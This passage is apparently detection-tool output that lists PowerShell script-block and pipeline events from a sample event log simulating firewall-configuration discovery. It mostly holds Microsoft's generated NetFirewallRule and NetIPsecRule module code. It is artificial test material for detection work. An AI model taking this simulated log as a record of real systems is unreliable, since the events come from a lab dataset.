$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdle",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecRule ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultVa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,lue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 